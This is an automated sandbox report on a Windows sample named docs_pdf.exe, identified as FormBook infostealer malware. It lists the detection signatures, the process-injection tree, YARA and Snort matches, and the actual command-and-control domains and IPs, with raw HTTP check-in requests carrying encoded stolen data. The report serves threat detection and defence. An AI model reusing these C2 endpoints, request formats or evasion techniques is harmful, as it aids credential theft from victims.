Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
docs_pdf.exe

Overview

General Information

Sample name:docs_pdf.exe
Analysis ID:1472520
MD5:942c50b985dc1e6eb49c1763d39d398f
SHA1:9de6943387aef034ae9d2eab93f4ef557aba7ad2
SHA256:455f3956ac0f7082228d48ed98ff0ea1d6f2cef1c01f6dc263502696e6a9a5b7
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • docs_pdf.exe (PID: 3340 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 942C50B985DC1E6EB49C1763D39D398F)
    • svchost.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • qsWkdNJOHuxNQUCXoUm.exe (PID: 5788 cmdline: "C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 3140 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • qsWkdNJOHuxNQUCXoUm.exe (PID: 4484 cmdline: "C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 3340, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5600, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 3340, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5600, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/13/24-00:07:48.656337
            SID:2855464
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:53.091829
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:18.355432
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:39.497873
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:09:06.939506
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:07:46.120127
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:55.622362
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:15.823053
            SID:2855464
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:09:09.468816
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:42.029982
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.xn--matfrmn-jxa4m.seAvira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrpAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: docs_pdf.exeReversingLabs: Detection: 44%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: docs_pdf.exeJoe Sandbox ML: detected
            Source: docs_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765523436.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906921154.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_01014696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C93C FindFirstFileW,FindClose,0_2_0101C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0101C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0279BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0279BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax3_2_02789870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h3_2_0471053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49737 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 23.251.54.212:80
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010225E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010225E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.hprlz.cz
            Source: global trafficDNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global trafficDNS traffic detected: DNS query: www.hatercoin.online
            Source: global trafficDNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global trafficDNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global trafficDNS traffic detected: DNS query: www.tinmapco.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.anuts.top
            Source: unknownHTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: tDA=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:46 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
